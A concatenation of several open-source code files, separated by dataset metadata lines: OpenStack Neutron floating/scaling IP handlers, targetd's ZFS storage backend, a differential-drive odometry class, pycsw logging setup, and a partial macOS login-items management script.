as well as any filters.
"""
LOG.info('get_floatingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
floating_ips = _get_ips_by_type(context, ip_types.FLOATING,
filters=filters, fields=fields)
return [v._make_floating_ip_dict(flip) for flip in floating_ips]
def get_floatingips_count(context, filters=None):
"""Return the number of floating IPs.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a floating IP as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:returns: The number of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
NOTE: this method is optional, as it was not part of the originally
defined plugin API.
"""
LOG.info('get_floatingips_count for tenant %s filters %s' %
(context.tenant_id, filters))
if filters is None:
filters = {}
filters['_deallocated'] = False
filters['address_type'] = ip_types.FLOATING
count = db_api.ip_address_count_all(context, filters)
LOG.info('Found %s floating ips for tenant %s' % (count,
context.tenant_id))
return count
def create_scalingip(context, content):
"""Allocate or reallocate a scaling IP.
:param context: neutron api request context.
:param content: dictionary describing the scaling ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_scalingip for tenant %s and body %s',
context.tenant_id, content)
network_id = content.get('scaling_network_id')
ip_address = content.get('scaling_ip_address')
requested_ports = content.get('ports', [])
network = _get_network(context, network_id)
port_fixed_ips = {}
for req_port in requested_ports:
port = _get_port(context, req_port['port_id'])
fixed_ip = _get_fixed_ip(context, req_port.get('fixed_ip_address'),
port)
port_fixed_ips[port.id] = {"port": port, "fixed_ip": fixed_ip}
scip = _allocate_ip(context, network, None, ip_address, ip_types.SCALING)
_create_flip(context, scip, port_fixed_ips)
return v._make_scaling_ip_dict(scip)
def update_scalingip(context, id, content):
"""Update an existing scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_scalingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
requested_ports = content.get('ports', [])
flip = _update_flip(context, id, ip_types.SCALING, requested_ports)
return v._make_scaling_ip_dict(flip)
def delete_scalingip(context, id):
"""Deallocate a scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
"""
LOG.info('delete_scalingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.SCALING)
def get_scalingip(context, id, fields=None):
"""Retrieve a scaling IP.
:param context: neutron api request context.
:param id: The UUID of the scaling IP.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_scalingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.SCALING, '_deallocated': False}
scaling_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not scaling_ip:
raise q_exc.ScalingIpNotFound(id=id)
return v._make_scaling_ip_dict(scaling_ip)
def get_scalingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of scaling ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a scaling ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of scaling IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
"""
LOG.info('get_scalingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
scaling_ips = _get_ips_by_type(context, ip_types.SCALING,
filters=filters, fields=fields)
return [v._make_scaling_ip_dict(scip) for scip in scaling_ips]
| apache-2.0 | -7,158,888,643,166,104,000 | 39.076672 | 79 | 0.631294 | false | 3.856672 | false | false | false |
open-iscsi/targetd | targetd/backends/zfs.py | 1 | 16228 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2012-2013, Andy Grover <[email protected]>
#
# Routines specific to ZFS to export zvols over iscsi
import distutils.spawn
import logging
import re
import subprocess
from time import time, sleep
from targetd.main import TargetdError
pools = []
pools_fs = dict()
zfs_cmd = ""
zfs_enable_copy = False
ALLOWED_DATASET_NAMES = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.\-]*$")
class VolInfo(object):
"""
Just to have attributes compatible with LVM info.
"""
uuid = ""
size = 0
def __init__(self, uuid, size):
self.uuid = uuid
self.size = size
def has_pool(pool_name):
"""
This can be used to check if module owns given pool without raising
exception
"""
return pool_name in pools
def has_fs_pool(pool_name):
"""
This can be used to check if module owns given fs_pool without raising
exception
"""
return pool_name in pools_fs
def has_udev_path(udev_path):
try:
pool, dataset = split_udev_path(udev_path)
except (IndexError, ValueError, TypeError):
return False
return True
def split_udev_path(udev_path):
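    # e.g. "/dev/tank/vol1" -> ("tank", "vol1") when "tank" is a managed pool
    # (names are illustrative).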
dataset = udev_path.split("/", 2)[2]
for p in pools:
if dataset.startswith(p + "/"):
return p, dataset.replace(p + "/", "", 1)
def pool2dev_name(pool):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return pool
def dev2pool_name(dev):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return dev
def get_so_name(pool, volname):
"""
Using % here, because it's not allowed in zfs dataset names and
/ is not allowed in target's storage object names
"""
return "%s:%s" % (pool.replace("/", "%"), volname)
def so_name2pool_volume(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return pool_name, vol_name
def has_so_name(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return has_pool(pool_name)
def get_dev_path(pool_name, vol_name):
return "/dev/%s/%s" % (pool2dev_name(pool_name), vol_name)
def initialize(config_dict, init_pools):
global pools
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
check_pools_access(init_pools)
pools = init_pools
def fs_initialize(config_dict, init_pools):
global pools_fs
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
pools_fs = {fs["mount"]: fs["device"] for fs in init_pools}
check_pools_access(list(pools_fs.values()))
def _check_dataset_name(name):
if not ALLOWED_DATASET_NAMES.match(name):
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Invalid dataset name, can only contain alphanumeric characters,"
"underscores, dots and hyphens",
)
def _zfs_find_cmd():
cmd = distutils.spawn.find_executable("zfs") or distutils.spawn.find_executable(
"zfs", "/sbin:/usr/sbin"
)
if cmd is None or not cmd:
raise TargetdError(
TargetdError.INVALID, "zfs_block_pools is set but no zfs command was found"
)
global zfs_cmd
zfs_cmd = cmd
def _zfs_exec_command(args=None):
if args is None:
args = []
for _ in range(3):
proc = subprocess.Popen(
[zfs_cmd] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(out, err) = proc.communicate()
if proc.returncode != 0:
logging.debug(
"zfs command returned non-zero status: %s, %s. Stderr: %s. Stdout: %s"
% (proc.returncode, args, out, err)
)
# See: https://github.com/openzfs/zfs/issues/1810
if b"dataset is busy" in err:
sleep(1)
logging.debug("Retrying on 'dataset is busy' error ...")
continue
else:
return proc.returncode, out, err
else:
return proc.returncode, out, err
def _zfs_get(datasets, properties, recursive=False, fstype="all"):
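    # Parses `zfs get -Hp` output into {dataset: {property: value}}, e.g.
    # {"tank/vol1": {"volsize": "1073741824", "guid": "123..."}}
    # (dataset names and values are illustrative).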
result = {}
flags = "-Hp"
if recursive:
flags = "-Hpr"
code, out, err = _zfs_exec_command(
["get", flags, "-t", fstype, ",".join(properties)] + datasets
)
for line in out.strip().split(b"\n"):
fields = str(line, encoding="utf-8").strip().split("\t")
if len(fields) < 2:
continue
if fields[0] in result:
result[fields[0]][fields[1]] = fields[2].strip()
else:
result[fields[0]] = {fields[1]: fields[2].strip()}
return result
def check_pools_access(check_pools):
if any([s.startswith(i + "/") for s in check_pools for i in check_pools]):
raise TargetdError(
TargetdError.INVALID,
"ZFS pools cannot contain both parent and child datasets",
)
if any(":" in p for p in check_pools):
raise TargetdError(TargetdError.INVALID, "Colon in ZFS pools is not supported")
if len(check_pools) == 0:
logging.debug("No ZFS pool defined, skipping ZFS")
return
_zfs_find_cmd()
props = _zfs_get(check_pools, ["type", "name"])
for p in check_pools:
if p not in props or "type" not in props[p]:
raise TargetdError(
TargetdError.INVALID, "ZFS dataset does not exist: %s" % (p,)
)
if props[p]["type"] != "filesystem":
raise TargetdError(
TargetdError.INVALID,
"ZFS dataset must be of 'filesystem' type. %s is %s"
% (p, props[p]["type"]),
)
def block_pools(req):
if not zfs_cmd:
return []
results = []
props = _zfs_get(pools, ["available", "used", "guid"])
for pool in pools:
results.append(
dict(
name=pool,
size=int(props[pool]["available"]) + int(props[pool]["used"]),
free_size=int(props[pool]["available"]),
type="block",
uuid=int(props[pool]["guid"]),
)
)
return results
def volumes(req, pool):
if not zfs_cmd:
return []
allprops = _zfs_get([pool], ["volsize", "guid"], True, "volume")
results = []
for fullname, props in allprops.items():
results.append(
dict(
name=fullname.replace(pool + "/", "", 1),
size=int(props["volsize"]),
uuid=props["guid"],
)
)
return results
def fs_hash():
if not zfs_cmd:
return {}
fs_list = {}
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool],
["name", "mountpoint", "guid", "used", "available"],
True,
"filesystem",
)
for fullname, props in allprops.items():
if fullname == zfs_pool:
continue
sub_vol = fullname.replace(zfs_pool + "/", "", 1)
key = props["name"]
fs_list[key] = dict(
name=sub_vol,
uuid=props["guid"],
total_space=int(props["used"]) + int(props["available"]),
free_space=int(props["available"]),
pool=pool,
full_path=props["mountpoint"],
)
return fs_list
def vol_info(pool, name):
props = _zfs_get([pool + "/" + name], ["guid", "volsize"], fstype="volume")
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["volsize"]))
def fs_info(pool, name):
props = _zfs_get(
[pool + "/" + name], ["guid", "used", "available"], fstype="filesystem"
)
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["available"]) + int(props["used"]))
def snap_info(pool, name, snapshot):
props = _zfs_get([pool + "/" + name + "@" + snapshot], ["guid"], fstype="snapshot")
if (pool + "/" + name + "@" + snapshot) in props:
props = props[pool + "/" + name + "@" + snapshot]
return dict(name=pool + "/" + name + "@" + snapshot, uuid=props["guid"])
def create(req, pool, name, size):
_check_dataset_name(name)
code, out, err = _zfs_exec_command(["create", "-V", str(size), pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def fs_create(req, pool, name, size):
_check_dataset_name(name)
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, name) is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME, "FS already exists with that name (ZFS)"
)
code, out, err = _zfs_exec_command(["create", zfs_pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def destroy(req, pool, name):
_check_dataset_name(name)
    # -r will destroy snapshots and children but not dependent clones
code, out, err = _zfs_exec_command(["destroy", "-r", pool + "/" + name])
if code != 0:
if b"volume has dependent clones" in err:
logging.error(
"Volume %s on %s has dependent clones and cannot be destroyed. Stderr: %s"
% (name, pool, err)
)
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Volume %s on %s has dependent clones and cannot be destroyed."
% (name, pool),
)
else:
logging.error(
"Could not destroy volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not destroy volume %s on pool %s" % (name, pool),
)
def fs_destroy(req, pool, name):
zfs_pool = pools_fs[pool]
destroy(req, zfs_pool, name)
def copy(req, pool, vol_orig, vol_new, size, timeout=10):
_copy(req, pool, vol_orig, vol_new, size, vol_info)
def _copy(req, pool, vol_orig, vol_new, size, info_fn, snap=None):
if not zfs_enable_copy:
raise TargetdError(
TargetdError.NO_SUPPORT,
"Copy on ZFS disabled. Consult manual before enabling it.",
)
_check_dataset_name(vol_orig)
_check_dataset_name(vol_new)
if info_fn(pool, vol_new) is not None:
raise TargetdError(
TargetdError.NAME_CONFLICT,
"Destination volume %s already exists on pool %s" % (vol_new, pool),
)
if snap is None:
snap = vol_new + str(int(time()))
code, out, err = _zfs_exec_command(
["snapshot", "%s/%s@%s" % (pool, vol_orig, snap)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create snapshot of %s on pool %s" % (vol_orig, pool),
)
args = ["clone"]
if size is not None:
args.extend(["-o", "volsize=%d" % size])
args.extend(["%s/%s@%s" % (pool, vol_orig, snap), "%s/%s" % (pool, vol_new)])
code, out, err = _zfs_exec_command(args)
if code != 0:
# try cleaning up the snapshot if cloning goes wrong
_zfs_exec_command(["destroy", "%s/%s@%s" % (pool, vol_orig, snap)])
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create clone of %s@%s on pool %s" % (vol_orig, snap, pool),
)
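# The copy path above boils down to the following ZFS operations
# (illustrative sketch; <pool>, <orig>, <new>, <snap> and <size> are
# placeholders, not fixed names):
#   zfs snapshot <pool>/<orig>@<snap>
#   zfs clone [-o volsize=<size>] <pool>/<orig>@<snap> <pool>/<new>
# and if the clone step fails, the snapshot is destroyed again to avoid
# leaving stray snapshots behind.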
def resize(req, pool, name, size):
args = ["set", "volsize=%d" % size, "%s/%s" % (pool, name)]
code, out, err = _zfs_exec_command(args)
if code != 0:
raise TargetdError(TargetdError.UNEXPECTED_EXIT_CODE, "Failed to resize volume")
def ss(req, pool, name):
snapshots = []
zfs_pool = pools_fs[pool]
# NOTE: Recursive is set to True as the ZFS version on Ubuntu in Travis does not appreciate getting snapshots
# by passing in a non-snapshot name. Somewhere between version 0.7.5 and 0.8.4 this got fixed
allprops = _zfs_get(
[zfs_pool + "/" + name], ["name", "guid", "creation"], True, "snapshot"
)
for fullname, props in allprops.items():
# Filter out any subvolume snapshots (these should not generally exist though
# and indicate an administration issue)
if not fullname.startswith(zfs_pool + "/" + name + "@"):
logging.warning(
"found additional subvolumes with snapshots while trying to list snapshots. Please do not"
" create subvolumes underneath targetd managed subvolumes"
)
continue
time_epoch = int(props["creation"])
st = dict(
name=props["name"].replace((zfs_pool + "/" + name + "@"), "", 1),
uuid=props["guid"],
timestamp=time_epoch,
)
snapshots.append(st)
return snapshots
def fs_snapshot(req, pool, name, dest_ss_name):
_check_dataset_name(name)
_check_dataset_name(dest_ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, dest_ss_name)
if info is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME,
"Snapshot {0} already exists on pool {1} for {2}".format(
dest_ss_name, pool, name
),
)
code, out, err = _zfs_exec_command(
["snapshot", "{0}/{1}@{2}".format(zfs_pool, name, dest_ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not create snapshot"
)
def fs_snapshot_delete(req, pool, name, ss_name):
_check_dataset_name(name)
_check_dataset_name(ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, ss_name)
if info is None:
return
code, out, err = _zfs_exec_command(
["destroy", "-r", "{0}/{1}@{2}".format(zfs_pool, name, ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not destroy snapshot"
)
def fs_clone(req, pool, name, dest_fs_name, snapshot_name=None):
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, dest_fs_name) is not None:
raise TargetdError(
TargetdError.EXISTS_CLONE_NAME, "FS already exists with that name (ZFS)"
)
_copy(req, zfs_pool, name, dest_fs_name, None, fs_info, snapshot_name)
def fs_pools(req):
results = []
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool], ["name", "used", "available"], False, "filesystem"
)
if zfs_pool in allprops:
props = allprops[zfs_pool]
results.append(
dict(
name=pool,
size=(int(props["used"]) + int(props["available"])),
free_size=int(props["available"]),
type="fs",
)
)
return results
| gpl-3.0 | -1,474,268,533,459,330,600 | 29.107607 | 113 | 0.561868 | false | 3.557992 | false | false | false |
merose/diff_drive | src/diff_drive/odometry.py | 1 | 2663 | from __future__ import division
from math import pi, sin, cos
from diff_drive.encoder import Encoder
from diff_drive.pose import Pose
class Odometry:
"""Keeps track of the current position and velocity of a
robot using differential drive.
"""
def __init__(self):
self.leftEncoder = Encoder()
self.rightEncoder = Encoder()
self.pose = Pose()
self.lastTime = 0
def setWheelSeparation(self, separation):
self.wheelSeparation = separation
def setTicksPerMeter(self, ticks):
self.ticksPerMeter = ticks
def setEncoderRange(self, low, high):
self.leftEncoder.setRange(low, high)
self.rightEncoder.setRange(low, high)
def setTime(self, newTime):
self.lastTime = newTime
def updateLeftWheel(self, newCount):
self.leftEncoder.update(newCount)
def updateRightWheel(self, newCount):
self.rightEncoder.update(newCount)
def updatePose(self, newTime):
"""Updates the pose based on the accumulated encoder ticks
of the two wheels. See https://chess.eecs.berkeley.edu/eecs149/documentation/differentialDrive.pdf
for details.
"""
leftTravel = self.leftEncoder.getDelta() / self.ticksPerMeter
rightTravel = self.rightEncoder.getDelta() / self.ticksPerMeter
deltaTime = newTime - self.lastTime
deltaTravel = (rightTravel + leftTravel) / 2
deltaTheta = (rightTravel - leftTravel) / self.wheelSeparation
if rightTravel == leftTravel:
deltaX = leftTravel*cos(self.pose.theta)
deltaY = leftTravel*sin(self.pose.theta)
else:
radius = deltaTravel / deltaTheta
# Find the instantaneous center of curvature (ICC).
iccX = self.pose.x - radius*sin(self.pose.theta)
iccY = self.pose.y + radius*cos(self.pose.theta)
deltaX = cos(deltaTheta)*(self.pose.x - iccX) \
- sin(deltaTheta)*(self.pose.y - iccY) \
+ iccX - self.pose.x
deltaY = sin(deltaTheta)*(self.pose.x - iccX) \
+ cos(deltaTheta)*(self.pose.y - iccY) \
+ iccY - self.pose.y
self.pose.x += deltaX
self.pose.y += deltaY
self.pose.theta = (self.pose.theta + deltaTheta) % (2*pi)
self.pose.xVel = deltaTravel / deltaTime if deltaTime > 0 else 0.
self.pose.yVel = 0
self.pose.thetaVel = deltaTheta / deltaTime if deltaTime > 0 else 0.
self.lastTime = newTime
def getPose(self):
        return self.pose
def setPose(self, newPose):
self.pose = newPose
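# Illustrative usage (sketch only; the numeric values are made-up examples,
# not project defaults):
#   odom = Odometry()
#   odom.setWheelSeparation(0.30)    # meters between the wheels
#   odom.setTicksPerMeter(10000)     # encoder ticks per meter of travel
#   odom.setEncoderRange(0, 32767)   # wrap-around range of the encoders
#   odom.setTime(0.0)
#   odom.updateLeftWheel(120)
#   odom.updateRightWheel(150)
#   odom.updatePose(0.1)
#   pose = odom.getPose()            # pose.x, pose.y, pose.theta, ...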
| bsd-3-clause | 5,621,864,774,542,927,000 | 32.708861 | 106 | 0.618475 | false | 3.569705 | false | false | false |
PublicaMundi/pycsw | pycsw/log.py | 1 | 3506 | # -*- coding: iso-8859-15 -*-
# =================================================================
#
# Authors: Tom Kralidis <[email protected]>
#
# Copyright (c) 2011 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
LOGGER = logging.getLogger(__name__)
MSG_FORMAT = '[%(asctime)s] [%(levelname)s] file=%(pathname)s \
line=%(lineno)s module=%(module)s function=%(funcName)s %(message)s'
TIME_FORMAT = '%a, %d %b %Y %H:%M:%S'
LOGLEVELS = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG,
'NOTSET': logging.NOTSET,
}
def setup_logger(config=None):
"""Initialize logging facility"""
if config is None:
return None
# Do not proceed if logging has not been set up.
if not (config.has_option('server', 'loglevel') or
config.has_option('server', 'logfile')):
return None
logfile = None
loglevel = 'NOTSET'
if config.has_option('server', 'loglevel'):
loglevel = config.get('server', 'loglevel')
if loglevel not in LOGLEVELS.keys():
raise RuntimeError(
'Invalid server configuration (server.loglevel).')
if not config.has_option('server', 'logfile'):
raise RuntimeError(
'Invalid server configuration (server.loglevel set,\
but server.logfile missing).')
if config.has_option('server', 'logfile'):
if not config.has_option('server', 'loglevel'):
raise RuntimeError(
'Invalid server configuration (server.logfile set,\
but server.loglevel missing).')
logfile = config.get('server', 'logfile')
if loglevel != 'NOTSET' and logfile is None:
raise RuntimeError(
'Invalid server configuration \
(server.loglevel set, but server.logfile is not).')
# Setup logging globally (not only for the pycsw module)
# based on the parameters passed.
logging.basicConfig(level=LOGLEVELS[loglevel],
filename=logfile,
datefmt=TIME_FORMAT,
format=MSG_FORMAT)
LOGGER.info('Logging initialized (level: %s).' % loglevel)
if loglevel == 'DEBUG': # turn on CGI debugging
LOGGER.info('CGI debugging enabled.')
import cgitb
cgitb.enable()
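# Illustrative configuration (sketch, not part of pycsw): setup_logger()
# expects a ConfigParser-style object providing has_option()/get(), and once
# either option is present it requires both server.loglevel and
# server.logfile, e.g.:
#   config = SafeConfigParser()
#   config.add_section('server')
#   config.set('server', 'loglevel', 'DEBUG')
#   config.set('server', 'logfile', '/tmp/pycsw.log')
#   setup_logger(config)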
| mit | -4,502,147,059,277,054,000 | 34.06 | 68 | 0.630918 | false | 4.339109 | true | false | false |
pudquick/pyLoginItems | pyLoginItems.py | 1 | 8789 | # /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Headers/LSSharedFileList.h
# Fun things:
# kLSSharedFileListFavoriteItems
# kLSSharedFileListFavoriteVolumes
# kLSSharedFileListRecentApplicationItems
# kLSSharedFileListRecentDocumentItems
# kLSSharedFileListRecentServerItems
# kLSSharedFileListSessionLoginItems
# kLSSharedFileListGlobalLoginItems - deprecated in 10.9
# Runs in user space, use this with a login script / launchd item / something running as the user
# Example usage:
#
# import pyLoginItems
# >>> pyLoginItems.list_login_items()
# [u'/Applications/Dropbox.app', u'/Applications/iTunes.app/Contents/MacOS/iTunesHelper.app']
#
# pyLoginItems.add_login_item('/Applications/Safari.app', 0)
# pyLoginItems.remove_login_item('/Applications/TextEdit.app')
from platform import mac_ver
from Foundation import NSURL
from LaunchServices import kLSSharedFileListSessionLoginItems, \
    kLSSharedFileListNoUserInteraction, kLSSharedFileListDoNotMountVolumes
# Need to manually load in 10.11.x+
os_vers = int(mac_ver()[0].split('.')[1])
if os_vers > 10:
from Foundation import NSBundle
import objc
SFL_bundle = NSBundle.bundleWithIdentifier_('com.apple.coreservices.SharedFileList')
functions = [('LSSharedFileListCreate', '^{OpaqueLSSharedFileListRef=}^{__CFAllocator=}^{__CFString=}@'),
('LSSharedFileListCopySnapshot', '^{__CFArray=}^{OpaqueLSSharedFileListRef=}o^I'),
('LSSharedFileListItemCopyDisplayName', '^{__CFString=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemResolve', 'i^{OpaqueLSSharedFileListItemRef=}Io^^{__CFURL=}o^{FSRef=[80C]}'),
('LSSharedFileListItemMove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemRemove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListInsertItemURL', '^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{__CFString=}^{OpaqueIconRef=}^{__CFURL=}^{__CFDictionary=}^{__CFArray=}'),
('kLSSharedFileListItemBeforeFirst', '^{OpaqueLSSharedFileListItemRef=}'),
('kLSSharedFileListItemLast', '^{OpaqueLSSharedFileListItemRef=}'),]
objc.loadBundleFunctions(SFL_bundle, globals(), functions)
else:
from LaunchServices import kLSSharedFileListItemBeforeFirst, kLSSharedFileListItemLast, \
LSSharedFileListCreate, LSSharedFileListCopySnapshot, \
LSSharedFileListItemCopyDisplayName, LSSharedFileListItemResolve, \
LSSharedFileListItemMove, LSSharedFileListItemRemove, \
LSSharedFileListInsertItemURL
def _get_login_items():
# Setup the type of shared list reference we want
list_ref = LSSharedFileListCreate(None, kLSSharedFileListSessionLoginItems, None)
# Get the user's login items - actually returns two values, with the second being a seed value
# indicating when the snapshot was taken (which is safe to ignore here)
login_items,_ = LSSharedFileListCopySnapshot(list_ref, None)
return [list_ref, login_items]
def _get_item_cfurl(an_item, flags=None):
if flags is None:
        # Attempt to resolve the items without interacting or mounting.
        # Note: the original summed kLSSharedFileListNoUserInteraction twice
        # here; the separate do-not-mount flag appears to be what was meant
        # (this assumes pyobjc exposes kLSSharedFileListDoNotMountVolumes
        # alongside the other LSSharedFileList constants).
        flags = kLSSharedFileListNoUserInteraction + kLSSharedFileListDoNotMountVolumes
err, a_CFURL, a_FSRef = LSSharedFileListItemResolve(an_item, flags, None, None)
return a_CFURL
def list_login_items():
# Attempt to find the URLs for the items without mounting drives
URLs = []
for an_item in _get_login_items()[1]:
URLs.append(_get_item_cfurl(an_item).path())
return URLs
def remove_login_item(path_to_item):
current_paths = list_login_items()
if path_to_item in current_paths:
list_ref, current_items = _get_login_items()
i = current_paths.index(path_to_item)
target_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, target_item)
def add_login_item(path_to_item, position=-1):
# position:
# 0..N: Attempt to insert at that index position, with 0 being first
# -1: Insert as last item
# Note:
# If the item is already present in the list, it will get moved to the new location automatically.
list_ref, current_items = _get_login_items()
added_item = NSURL.fileURLWithPath_(path_to_item)
if position == 0:
# Seems to be buggy, will force it below
destination_point = kLSSharedFileListItemBeforeFirst
elif position == -1:
destination_point = kLSSharedFileListItemLast
elif position >= len(current_items):
# At or beyond to the end of the current list
position = -1
destination_point = kLSSharedFileListItemLast
else:
# 1 = after item 0, 2 = after item 1, etc.
destination_point = current_items[position - 1]
# The logic for LSSharedFileListInsertItemURL is generally fine when the item is not in the list
# already (with the exception of kLSSharedFileListItemBeforeFirst which appears to be broken, period)
# However, if the item is already in the list, the logic gets really really screwy.
# Your index calculations are invalidated by OS X because you shift an item, possibly shifting the
# indexes of other items in the list.
# It's easier to just remove it first, then re-add it.
current_paths = list_login_items()
if (len(current_items) == 0) or (position == -1):
# Either there's nothing there or it wants to be last
# Just add the item, it'll be fine
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
elif (position == 0):
# Special case - kLSSharedFileListItemBeforeFirst appears broken on (at least) 10.9
# Remove if already in the list
if path_to_item in current_paths:
i = current_paths.index(path_to_item)
old_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, old_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
if (len(current_items) == 0):
# Simple case if nothing remains in the list
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
else:
# At least one item remains.
# The fix for the bug is:
# - Add our item after the first ('needs_fixing') item
# - Move the 'needs_fixing' item to the end
# - Move the 'needs_fixing' item after our added item (which is now first)
needs_fixing = _get_item_cfurl(current_items[0])
# Move our item
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, added_item, {}, [])
if not (result is None):
# Only shift if the first insert worked
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item last
result = LSSharedFileListInsertItemURL(list_ref, kLSSharedFileListItemLast, None, None, needs_fixing, {}, [])
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
